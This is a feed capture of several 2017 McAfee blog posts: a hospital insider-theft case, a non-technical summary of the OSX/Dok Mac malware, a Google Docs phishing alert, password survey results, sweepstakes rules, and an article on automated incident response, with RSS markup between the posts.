Der Kampf um die Cyber-Sicherheit zwischen den berüchtigten Black Hats und den White Hats aufseiten der Verteidiger erinnert an ein Katz-und-Maus-Spiel. Im Moment scheinen die Black Hats den White Hats stets einen Schritt voraus zu sein, doch das Feld ist ständig in Bewegung. Doch was motiviert die beiden Seiten? Testen Sie mit unserem aktuellen #IncentiveQuiz Ihr Wissen zu den Anreizen für Black Hats und White Hats. Erfahren Sie, was Black Hats zu Verbrechen motiviert und welche Defizite White Hats ausbremsen.

Note: There is a widget embedded within this post, please visit the site to participate in this post's widget.

The post Missverhältnis der Anreize #IncentiveQuiz appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/languages/german/missverhaltnis-der-anreize-incentivequiz/feed/ 0
Décalage des incitants #IncentiveQuiz https://securingtomorrow.mcafee.com/languages/francais/decalage-des-incitants-incentivequiz/ https://securingtomorrow.mcafee.com/languages/francais/decalage-des-incitants-incentivequiz/#respond Fri, 05 May 2017 09:00:17 +0000 https://securingtomorrow.mcafee.com/?p=73587 Entre les tristement célèbres Black Hats et les White Hats éthiques et engagés, la lutte contre le cybercrime peut parfois ressembler au jeu du chat et de la souris. Aujourd’hui, les pirates mal intentionnés semblent toujours avoir une longueur d’avance sur les experts en piratage éthique. Les attaques et contre-attaques se succèdent à un rythme …

The post Décalage des incitants #IncentiveQuiz appeared first on McAfee Blogs.

]]>
Entre les tristement célèbres Black Hats et les White Hats éthiques et engagés, la lutte contre le cybercrime peut parfois ressembler au jeu du chat et de la souris. Aujourd’hui, les pirates mal intentionnés semblent toujours avoir une longueur d’avance sur les experts en piratage éthique. Les attaques et contre-attaques se succèdent à un rythme incessant. Mais qu’est-ce qui motive les uns et les autres ? Testez vos connaissances des motivations des Black Hats et des White Hats avec notre dernier #IncentiveQuiz. Découvrez ce qui pousse les pirates mal intentionnés au crime et les incitants qui font défaut aux pirates éthiques.

Note: There is a widget embedded within this post, please visit the site to participate in this post's widget.

The post Décalage des incitants #IncentiveQuiz appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/languages/francais/decalage-des-incitants-incentivequiz/feed/ 0
Need a fix? Steal patient data https://securingtomorrow.mcafee.com/business/safeguard-data/need-a-fix-steal-patient-data/ Thu, 04 May 2017 22:41:46 +0000 https://securingtomorrow.mcafee.com/?p=73616 The health care sector continues to be a sieve when it comes to protecting patients’ Personally Identifiable Information (PII) and Protected Health Information (PHI). Often, the data breach involving PII or PHI is discovered by a third party, which leaves the doctor, dentist, hospital or pharmacy dumped into sleuth mode. This was not the case …

The post Need a fix? Steal patient data appeared first on McAfee Blogs.

]]>
The health care sector continues to be a sieve when it comes to protecting patients’ Personally Identifiable Information (PII) and Protected Health Information (PHI). Often, the data breach involving PII or PHI is discovered by a third party, which leaves the doctor, dentist, hospital or pharmacy dumped into sleuth mode.

This was not the case with Canadian medical provider, William Osler Health Systems (Osler). According to Canadian news outlet 680news, in January Osler launched an internal investigation into patient information being used to illicitly acquire a prescription narcotic, Percocet. Osler’s internal narcotic stores of Percocet was inexplicably being depleted. What is unclear is if local pharmacies also reported an influx in fulfilling prescriptions for Percocet, 680news reported. Osler has not revealed the number of individuals affected. A call for clarification to Osler was not returned.

CTV-News reported that the Osler investigation pointed to one of its registered nurses, Catharina Demme, who Osler has confirmed had accessed the PHI and PII of patients. Various media reports cite individuals who were affected despite not using Osler’s services in several years. Therefore, it is logical to conclude the information being accessed by Demme was both current and historical PII/PHI records.

Peel Police’s late-April press release states, “Catharina Demme gained access to patient names from a list on a computer database in order to access narcotics for non-hospital related use. Demme only had limited access to patient information.” Demme, who was arrested on March 30, has been charged with “Breach of Trust and Theft under $5,000.” Peel Regional Police (Canada) Constable Mark Fischer, commented to CBC, “She (Demme) was taking a quantity of drugs, in this incident mostly Percocet, using different names to get this quantity of drugs.”

Trusted insider breaks trust

Demme, a registered nurse, had access to the hospital patient record systems at Osler. Osler publicly declares its has logging, auditing and monitoring policies and procedures in place, including communication of these controls to all “authorized users.”

And there is the rub. Demme had authorized access to the information. It was her alleged pilfering the Percocet from the dispensary that apparently was the impetus for the internal investigation within Osler. It does not appear to have been her sifting through patient files looking for the ones who had Percocet prescriptions.

One of the most difficult tasks for protection of PII/PHI for health care providers is the electronic audit process. The audit trail will show patient data being accessed by an authorized user. Does the audit trail correlate to an actual need to know by the authorized user? This is the more difficult question.

That is to say, is the patient whose records are being accessed presenting themselves for treatment or consult?

The question for health care information technology teams is would your company know if the patient data being accessed is for a patient who is currently getting care.

Are the various physical touch points with patients (telephone, consults, in/out patient appointments, etc.) within the medical engagement associated with authorized user access to medical records.

Collating and processing such disparate data will provide clarity, not only within the health care sector but also in the protection of any sensitive data.

The key can be found within the answer to the question: Does your data protection technologies distinguish the difference between “need to know” and “curiosity or malevolent access?”

While no reference has been made to a violation of Canada’s Personal Health Information Protection Act (PHIPA), available information certainly points in this direction. According to CTV-News, Osler is taking steps to preclude a recurrence of this “type of event.”

 

This article was written by Christopher Burgess from CSO Magazine and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Need a fix? Steal patient data appeared first on McAfee Blogs.

]]>
New Mac Malware Manages to Spy on Encrypted Browser Traffic https://securingtomorrow.mcafee.com/business/new-mac-malware-manages-spy-encrypted-browser-traffic/ https://securingtomorrow.mcafee.com/business/new-mac-malware-manages-spy-encrypted-browser-traffic/#respond Thu, 04 May 2017 19:00:56 +0000 https://securingtomorrow.mcafee.com/?p=73462 This blog was written by Douglas McKee. There’s a new cyberattack targeted at Mac OS users—a malware program called OSX/Dok. Discovered late last week primarily in Europe, the program is capable of spying on encrypted browser traffic to steal sensitive information. You heard correctly: it can eavesdrop on all of your web browsing. How does …

The post New Mac Malware Manages to Spy on Encrypted Browser Traffic appeared first on McAfee Blogs.

]]>
This blog was written by Douglas McKee.

There’s a new cyberattack targeted at Mac OS users—a malware program called OSX/Dok. Discovered late last week primarily in Europe, the program is capable of spying on encrypted browser traffic to steal sensitive information. You heard correctly: it can eavesdrop on all of your web browsing.

How does this attack work?

First, the Trojan is digitally signed with a previously valid Apple certificate. It initially relies on social engineering, first phishing for credentials through either email or by displaying a full-screen alert that claims there’s an urgent OS X update waiting to be installed. Once it gets access, the Trojan makes the necessary changes it needs to infiltrate the user’s browsing activity.

It elevates the privileges of the current user to a permanent administrator and bypasses additional password prompts, keeping the rest of the infection process quiet. DoK also replaces existing login entries with its own so it runs when the user logs onto the computer. Then, it redirects all traffic to the Dark Web through a malicious proxy server and installs its own root certificate on the machine. From there, the attacker can carry out a man-in-the-middle attack and decrypt the user’s HTTPS traffic by pretending to be whichever website the victim attempts to access.

Since browsers typically alert users of compromised website connections, how are they not catching this attack? Because of the bad root certificate.

How do you protect yourself?

Apple mitigated the risk by revoking the certificate used in the attack. But there’s still more you can do to protect yourself from this attack and others like it.

NEVER open attachments or click on links from unknown senders. Also, check the source of the email and ensure legitimacy. Always be cautious whenever you’re asked to provide credentials.

Whenever possible, Apple users should only install apps from the Apple app store to ensure they’re only using applications that Apple has screened and approved.

To learn more about this cyberattack and others like it, make sure to follow @McAfee and @McAfee_Business.

The post New Mac Malware Manages to Spy on Encrypted Browser Traffic appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/new-mac-malware-manages-spy-encrypted-browser-traffic/feed/ 0
World Password Day RT to Win Sweepstakes https://securingtomorrow.mcafee.com/consumer/password-day-sweepstakes/ https://securingtomorrow.mcafee.com/consumer/password-day-sweepstakes/#respond Thu, 04 May 2017 13:01:53 +0000 https://securingtomorrow.mcafee.com/?p=73391 Terms and Conditions How to Win: Happy World #PasswordDay! Once completed share your results on Twitter and tag @McAfee_Home, #PasswordDay, #RT2Win, and #Sweepstakes for a chance at a $50 Amazon Gift card. Two total winners will be selected: the first drawing will happen on May 11, 2017, and the second drawing will happen on May …

The post World Password Day RT to Win Sweepstakes appeared first on McAfee Blogs.

]]>
Terms and Conditions

How to Win:

Happy World #PasswordDay! Once completed share your results on Twitter and tag @McAfee_Home, #PasswordDay, #RT2Win, and #Sweepstakes for a chance at a $50 Amazon Gift card. Two total winners will be selected: the first drawing will happen on May 11, 2017, and the second drawing will happen on May 19, 2017.  Winners will be posted on Twitter and notified by direct message.

For full Sweepstakes details, please see the Terms and Conditions below:

McAfee World Password Day #RT2Win Sweepstakes Terms and Conditions

  1. How to enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee’s World Password Day #RT2Win Sweepstakes will be conducted for three weeks, from May 4th through May 19th. All entries for each day of the McAfee World Password Day #RT2Win Sweepstakes must be received during the time allotted for the World Password Day #RT2Win Sweepstakes. Pacific Daylight Time shall control the McAfee World Password Day #RT2Win Sweepstakes. One winner will be chosen for each of the World Password Day #RT2Win ads. The McAfee World Password Day #RT2Win Sweepstakes duration is as follows.

World Password Day #RT2Win Sweepstakes:

  • Thursday, May 4th­­ – Thursday, May 11th
    • One winner announced Thursday, May 11th, 12:00pm PST
  • Friday, May 12th – Friday, May 19th
    • One winner announced: Thursday, May 19th, 12:00pm PST

For the McAfee World Password Day #RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the McAfee World Password Day #RT2Win Sweepstakes:

  1. Find the sweepstakes tweet of the day, which will include the hashtags: #RT2Win, #Sweepstakes, and #PasswordDay
  2. Retweet the sweepstakes tweet of the day and make sure it includes both the #RT2Win, #Sweepstakes, and #PasswordDay hashtags.

One winner will be chosen for each McAfee World Password Day #RT2Win Sweepstakes tweet from the viable pool of entries that retweeted and included #RT2Win, #Sweepstakes #PasswordDay World Password Day #RT2Win Sweepstakes. McAfee and the McAfee social team will choose winner from all the viable entries. The winner of each week will be announced by 12:00pm PDT the following week on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes. Participants are only eligible to win in one of the two drawings.  

  1. Eligibility: 

McAfee World Password Day #RT2Win Sweepstakes is open to all legal residents of the 50 United States or District of Columbia who are 18 years of age or older on the date the McAfee World Password Day #RT2Win Sweepstakes begins and live in a jurisdiction where this prize and McAfee World Password Day #RT2Win Sweepstakes are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

  1. Winner Selection:

Winners will be selected from the eligible entries received during each of the McAfee World Password Day #RT2Win Sweepstakes periods. Sponsor will select the names of [2] potential winners of the prizes in a random drawing from among all eligible Submissions at the address listed below. The odds of winning depend on the number of eligible entries received. will only be eligible to win one of the weeks. By participating, entrants agree to be bound by the Official McAfee World Password Day #RT2Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

Winner Notification: Each winner will be notified via direct message (“DM”) on Twitter.com by 12:00pm PDT on each of the days listed above. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

  1. Prizes: 

The prize for each McAfee World Password Day #RT2Win Sweepstakes is a $50 Amazon e-gift card (approximate retail value “ARV” of the prize is $50 USD).

Entrants agree that Sponsor has the sole right to determine the winners of the McAfee World Password Day #RT2Win Sweepstakes and all matters or disputes arising from the McAfee World Password Day #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.
Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

  1. General conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner.

Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee World Password Day #RT2Win Sweepstakes, or by any technical or human error, which may occur in the processing of the McAfee World Password Day #RT2Win Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the McAfee World Password Day #RT2Win Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any McAfee World Password Day #RT2Win Sweepstakes -related activity, or participation in the McAfee World Password Day #RT2Win Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

Limitations of Liability; Releases: By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE SPONSOR OR THE RELEASED PARTIES BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOSS OF USE, LOSS OF PROFITS OR LOSS OF DATA, WHETHER IN AN ACTION IN CONTRACT, TORT (INCLUDING, NEGLIGENCE) OR OTHERWISE, ARISING OUT OF OR IN ANY WAY CONNECTED TO YOUR PARTICIPATION IN THE SWEEPSTAKES OR USE OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE SWEEPSTAKES OR ANY PRIZE, EVEN IF A RELEASED PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

  1. TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE AGGREGATE LIABILITY OF THE RELEASED PARTIES (JOINTLY) ARISING OUT OF OR RELATING TO YOUR PARTICIPATION IN THE SWEEPSTAKES OR USE OF OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE SWEEPSTAKES OR ANY PRIZE EXCEED $10. THE LIMITATIONS SET FORTH IN THIS SECTION WILL NOT EXCLUDE OR LIMIT LIABILITY FOR PERSONAL INJURY OR PROPERTY DAMAGE CAUSED BY PRODUCTS RENTED FROM THE SPONSOR, OR FOR THE RELEASED PARTIES’ GROSS NEGLIGENCE, INTENTIONAL MISCONDUCT, OR FOR FRAUD.
  2. Use of Use of Winner’s Name, Likeness, etc.:Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list).  As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation.  By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

Prize Forfeiture: If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize McAfee World Password Day #RT2Win Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each McAfee World Password Day #RT2Win Sweepstakes.

Dispute Resolution:  Entrants agree that Sponsor has the sole right to determine the winners of the McAfee World Password Day #RT2Win Sweepstakes and all matters or disputes arising from the McAfee World Password Day #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Governing Law & Disputes: EACH ENTRANT AGREES THAT ANY DISPUTES, CLAIMS, AND CAUSES OF ACTION ARISING OUT OF OR CONNECTED WITH THIS SWEEPSTAKES OR ANY PRIZE AWARDED WILL BE RESOLVED INDIVIDUALLY, WITHOUT RESORT TO ANY FORM OF CLASS ACTION and these rules will be construed in accordance with the laws, jurisdiction, and venue of Delaware.

Privacy Policy Personal information obtained in connection with this prize McAfee World Password Day #RT2Win Sweepstakes will be handled in accordance policy set forth at http://www.mcafee.com/us/about/privacy.html

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after May 19th2017 and before May 19th 2018 to the address listed below, Attn: World Password Day #RT2Win Sweepstakes.  To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed in below, Attn: Margie Easter.  VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2017 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters2821 Mission College Blvd.Santa Clara, CA 95054 USA

The post World Password Day RT to Win Sweepstakes appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/password-day-sweepstakes/feed/ 0
Is Your Password a Priority? Top Takeaways From Our World Password Survey https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/password-habits/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/password-habits/#comments Thu, 04 May 2017 04:01:47 +0000 https://securingtomorrow.mcafee.com/?p=73110 Whether you’re signing up for a new video-streaming service, logging back into your email, or checking your online banking, passwords play a big part in our everyday lives. They help us buy what we want, stream our favorite entertainment, retrieve critical information, and most importantly, keep our personal information out of the wrong hands. But, …

The post Is Your Password a Priority? Top Takeaways From Our World Password Survey appeared first on McAfee Blogs.

]]>
Whether you’re signing up for a new video-streaming service, logging back into your email, or checking your online banking, passwords play a big part in our everyday lives. They help us buy what we want, stream our favorite entertainment, retrieve critical information, and most importantly, keep our personal information out of the wrong hands. But, in the modern digital world, our connected lifestyles make it so that we all have more online accounts than ever before, which means more passwords than ever. That, in turn, has created some mixed emotions towards these gatekeepers. So, to see just exactly how consumers think and feel about their passwords, and in honor of World Password Day, we conducted a survey amongst 3,000 people across Australia, France, Germany, U.K., and U.S, and discovered a few key takeaways that we’d like to share with you:


Storage Stays Old School

Consumers are living a connected lifestyle now more than ever, which means they’re downloading more apps, accessing more websites, and creating more accounts—all of which require a password. That also means consumers have to somehow keep track of more passwords.

So, with such a large amount to remember, how do people organize their passwords so that they can recall them when the time comes to log back into their account? As it turns out, our survey discovered that one of the most popular ways individuals keep track of passwords is by writing them down. Specifically, a total of 37% of respondents track the old-fashioned way, admitting to keeping a list with all of their passwords on paper, which they place somewhere they deem safe.

Another more traditional, and less secure, methodology behind storing passwords is simply reusing passwords across multiple accounts, with 34% of respondents in the U.S. admitting to doing this on a regular basis.

Luckily, using a password manager came in as the third most common storage method, with 20% claiming they do in fact use some type of management software. Password managers are the best of both worlds, since they allow us to quickly and easily access our information without having to sacrifice our personal security in the process. Plus, they make it so we don’t have jog our memory to recall one of our many passwords.

Remembering is Frustrating 

In fact, it is the act of remembering that is creating a sense of frustration for consumers, causing them to turn to these old-school storage techniques. Just how much of a pain point is remembering all these passwords? Over a quarter (26%) of individuals would be willing to give up pampering (manicures, pedicures, massages, etc.) if they never had to remember a password again. And 10% of those surveyed claimed that they would be willing to give up their favorite food in exchange for not having to remember passwords.

Access is Still More Important Than Protection

People’s need to easily and quickly access their email, social media, whatever it may be, has made personal security a low priority amongst consumers. In fact, when creating passwords, less than half (46%) of respondents claim that their main concern is security strength. Sadly, 34% are most concerned with the ease of remembering their passwords, and shockingly, 59% of respondents are open to sharing their passwords with others. The most common passwords shared were for video streaming apps with just under a quarter (23%) claiming they are comfortable sharing their password to these services.

Clearly, password security needs to become more top of mind for consumers. That’s where we can help. Whether you’re creating a new account online, or trying to remember an old password into a site, keep these security tips in mind to ensure your account information, and therefore your personal data, doesn’t get into the wrong hands:

-Create strong passwords. Passwords are the keys to our digital lives, so make sure you create strong and unique passwords to keep unwanted people out. The more complex your password is, the more difficult it will be to crack. Not to mention, make sure to avoid common and easy to crack passwords like “12345” or “password.”

-Utilize multi-factor authentication (MFA). Having multiple factors to authenticate your accounts, like your fingerprint, face, or a trusted device, both improves security and makes accessing your online accounts easier. If you use a service that offers MFA, be sure to enable it. The more factors you can combine, the safer your accounts will be.

-Use a password manager. Take your security to another level with a password manager, like the True Key app.  A password manager can help you create strong and secure passwords, remove the hassle of remembering numerous passwords and log you into your favorite websites automatically using multi-factor authentication.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Is Your Password a Priority? Top Takeaways From Our World Password Survey appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/password-habits/feed/ 1
Heads Up: Massive Google Doc Phishing Scam Has Hit the Scene and is Spreading Fast https://securingtomorrow.mcafee.com/business/heads-massive-google-doc-phishing-scam-hit-scene-spreading-fast/ https://securingtomorrow.mcafee.com/business/heads-massive-google-doc-phishing-scam-hit-scene-spreading-fast/#respond Wed, 03 May 2017 23:02:50 +0000 https://securingtomorrow.mcafee.com/?p=73406 Practically everyone uses Google Docs—you can collaborate with coworkers and friends, sharing any information you want to in real-time. Now, a new cyberattack has emerged in which a Google doc phishing link is sent a victim, hoping they click it and infect themselves with malware. But here’s the catch—this nasty malware manages to mask itself …

The post Heads Up: Massive Google Doc Phishing Scam Has Hit the Scene and is Spreading Fast appeared first on McAfee Blogs.

]]>
Practically everyone uses Google Docs—you can collaborate with coworkers and friends, sharing any information you want to in real-time. Now, a new cyberattack has emerged in which a Google doc phishing link is sent a victim, hoping they click it and infect themselves with malware. But here’s the catch—this nasty malware manages to mask itself as a sender who is a familiar face to the victim. And unfortunately, is pretty convincing.

This phishing scam has hit Gmail inboxes everywhere today. And, leveraging a common social engineering technique, it looks exactly like an email from a friend would. Here’s a screenshot of what the message looks like in a victim’s inbox, as provided by Fortune:

 

 

So, what happens if you click on the malicious link in your inbox? First, you arrive at a login screen that looks almost identical to the same screen you’d see if someone actually invited you to a Google Doc. It lists your Google Accounts, and it even reflects Google’s recent redesign. What’s worse—the page manages to resemble a very realistic Google.com URL and clicking on the link appears to confirm the page’s legitimacy.

Then, that page invites you to choose which account you’d like to use to view the Google Doc, and you’re taken to a page that invites you to grant access to your Google Account. Basically, you’ve just given the cybercriminal launching the attack gains access into your entire Gmail account.

Beyond social engineering its victims, this attack’s success is dependent on a flaw in Google’s security design. The page that lists the apps with access to your Gmail count isn’t able to distinguish between apps that are made by Google and apps that aren’t.

Fortunately, Google has already responded to the incident and plugged holes. As a spokesperson stated, “We have taken action to protect users against an email spam campaign impersonating Google Docs, which affected fewer than 0.1% of Gmail users. We protected users from this attack through a combination of automatic and manual actions, including removing the fake pages and applications, and pushing updates through Safe Browsing, Gmail, and other anti-abuse systems.” Regarding the extent of damage done to that .1%, the spokesperson said, “While contact information was accessed and used by the campaign, our investigations show that no other data was exposed.”

Additionally, the tech giant responded to the attack by releasing a new security feature for Gmail on Android that warns users when they click on a suspicious link in an email.

So, what happens if you’re sent a questionable link from a “friend” today? The good news is this phishing email has been consistently addressed to “hhhhhhhhhhhhhh,” so clearly you can identify the attack that way. And if you do in fact receive this scam, do not click the link.

Clicking on links from your email is highly risky. McAfee chief scientist Raj Samani warns, “Phishing attacks remain the most common method of manipulating individuals into clicking on links and ultimately installing malicious content onto their systems.”

Samani suggests being aware of the emails that you’re expecting and we wary of every unexpected email. “Go straight to the source through a different communication channel if you receive a link you were not expecting. Also, hover over links to see if it is a reliable URL. Or search online for other instances of this campaign and what those instances could tell you about the email’s legitimacy.”

Then, delete suspicious emails entirely. In the case of this scam, make sure to report receiving it to Google as they’ve requested (see below).

Unfortunately, though there has been some speculation, it is yet to be determined who is responsible for this attack.

To gain further insight on how to protect yourself from phishing scams like this and to stay up-to-date on all cybersecurity news, make sure to follow @McAfee and @McAfee_Business.

The post Heads Up: Massive Google Doc Phishing Scam Has Hit the Scene and is Spreading Fast appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/heads-massive-google-doc-phishing-scam-hit-scene-spreading-fast/feed/ 0
Automated mitigation on endpoint devices and networks can be tricky https://securingtomorrow.mcafee.com/business/optimize-operations/automated-mitigation-on-endpoint-devices-and-networks-can-be-tricky/ Wed, 03 May 2017 22:42:53 +0000 https://securingtomorrow.mcafee.com/?p=73398 Many companies have automated systems in place for preventing, detecting, and investigating security incidents, but automating the incident response and mitigation process for networks and endpoint devices has been a tougher nut to crack. That includes actions such as automatically re-imaging endpoint devices, isolating devices from corporate networks, or shutting down particular network processes in …

The post Automated mitigation on endpoint devices and networks can be tricky appeared first on McAfee Blogs.

]]>
Many companies have automated systems in place for preventing, detecting, and investigating security incidents, but automating the incident response and mitigation process for networks and endpoint devices has been a tougher nut to crack.

That includes actions such as automatically re-imaging endpoint devices, isolating devices from corporate networks, or shutting down particular network processes in order to quickly and efficiently respond to attacks.

“I think there’s a lot of potential,” said Joseph Blankenship, analyst at Forrester Research. “We’re definitely in a period of discovery, though, and that has to take place before we’re going to see widespread, mainstream adoption.”

Enterprises first need to get more experience with security automation tools, he said, and see what impact they have.

But full incident response automation is probably three to five years from becoming reality, he said.

“I think we’re seeing some early attempts,” he said. “Say, if every time you see the same threat indicator, the analyst gets action recommendations from an automated tool or machine learning algorithm and makes the same choice, to click yes, let’s go ahead and take the next step. Then if we do that 500 or 1,000 times we can agree that this is a process that we can fully automate and take the analyst fully out of the loop.”

At that point, the analysts can focus on their more difficult, complex situations.

But companies can also approach automation without a machine learning system, if they already have incident response playbooks in use at their company, said Ariel Tseitlin, partner at Foster City, Calif.-based investment firm Scale Venture Partners.

“Take one of those playbooks, and take security automation tools, and test how much of that playbook can be automated,” he said. “That’s a very practical and real way of going and determining if a tool is applicable for an individual environment and how much benefit you can get from it.”

Even partial automation can be very effective, he said.

“Say you have malware on an endpoint, and your playbook for that has 50 steps in it,” he said. “If you can, say, automate 80 percent of it, you can see how many hours of savings you’ll get for your security team, and you can quickly get proof of value.”

Tseitlin said that he talks with customers when deciding whether to invest in any particular security startup, and he’s finding that there’s already real value that’s being realized.

One key factor that determines whether a particular incident response technology works is whether the enterprise itself is ready for automation.

“Different companies are at different stages of security maturity,” he said. “If you haven’t thought about the process, then thinking about automation is really premature. The first thing you have to do is map out the risks, threats and controls, and then you think about how you go through implementing each of those controls. But then when you’ve gone through that, automation is a great way to accelerate and improve the efficiency of the organization.”

Cleaning up the end points

One of the earliest uses of automation on endpoint devices has been to quarantine or remove malware files before they do any damage.

Almost every PC now has some form of anti-virus, and many companies are also using behavior-based malware detection to spot new threats.

A manual response would be too slow, since malware can act quickly to damage a device, or even to start spreading to other machines on the same network.

“So it’s not a new concept,” said Rob Clyde, security consultant and member of the ISACA board of directors.

But what happens if a user clicks on a malicious link or attachment, and installs malware that is able to evade all the defenses, install itself on the machine, and begin to do damage?

A typical response would be to store a copy of the device image for later forensic analysis, wipe the machine, restore it from a clean image, and restore the user’s files from the latest backup. While this is all happening, the user might get sent to take some anti-phishing training so to be more careful next time.

Automating this process is easier for some companies than others, said Clyde.

“Some have gone to complete virtual desktops,” he said. “In essence, their desktop is always available to be re-imaged, because the physical machine is just a host for the virtual desktop.”

Similarly, if a company has its employees use a cloud-based platform like Office 365 and saves all work documents on either their own servers, or in the cloud, then reimaging can also be relatively quick and easy.

In both cases, there’s less risk of losing valuable files in the process, which reduces the potential damage that can be caused if there was no actual infection.

“At the very same time, we have heavy knowledge workers, say, someone in a marketing organization, who is constantly working on new ad copy and PowerPoint presentations,” he said. “These are still often stored, at many companies, locally on the individual machine. The idea of wiping that machine and losing a day’s work unnecessarily is putting some companies off of trying to adopt this.”

Isolating the threat

Another common technique for automated mitigation is to quarantine infected machines.

“You might not wipe it, but it won’t spread the infection any further,” he said.

But doing this requires more than just having endpoint protection in place, he said.

“It does require network access controls,” he said. “If you have a link between the detection of the infected endpoint, and the network access control system, that can automatically link back with network security products and actually keep that device from connecting to the network.”

But too often, when products that have those capabilities are deployed, they aren’t implemented.

“In some cases, there’s a bit of a check-the-box mentality,” he said. “And nobody is asking whether I’ve implemented the network access controls. They should add that to the check list.”

In a large organization, there could be an additional barrier to setting up these kinds of systems in that the people responsible for the networks and the people responsible for endpoints are two different groups.

“It requires cooperation,” he said, “and sometimes the cooperation is just too hard to get.”

In addition, there’s the question of how many devices have to be isolated, said Jon Oltsik, senior principal analyst at Enterprise Strategy Group.

“If I quarantine one system, that’s fine,” he said. “But if I’m quarantining more systems, it gets more complex.”

As the required response gets more extensive, the more complicated it gets, he said. “And the more confidence you have to have that you’re doing the right thing.”

Smart networks

There are many tools available today that can detect suspicious activity on the network.

“You see a person in marketing has launched a network scan – that shouldn’t happen, so you can quarantine that system,” said Oltsik. “Or you see systems beaconing out to known command and control servers, so you can stop them at the system level or the network level. That’s pretty routine, and there are lots of companies that do that.”

But the more sophisticated the attack, the harder it is to automate a response, he said.

That doesn’t mean network vendors aren’t trying.

Network security has been a hotbed of activity recently when it comes to automation, said ISACA’s Clyde.

“If you were to walk around the last RSA show, you would see network security company after network security company touting how they automate detection of attacks and in some cases automatically take action,” he said.

But opinion is divided as to whether this is a good idea.

“Some voice concerns about taking action without human involvement, especially if a system was not 100 percent deterministic,” he said. “They might get it wrong, and take some action that might block legitimate activity. But others are like, ‘The attackers move too quickly and we need automation.'”

If false positives are too high, companies prefer to send the alerts to analysts for manual response.

“We are making progress,” he said. “But the state of the art tends to be about detecting, and not taking action, except for cases where it’s 99.9 percent certain that it’s real.”

Fortunately, because of improving technology, human analysts are able to handle and monitor a lot more than they could even a couple of years ago, he said.

“That’s the good news,” he said. “The bad news is, I’m not sure that we’re keeping up with the innovation on the attacker side.”

 

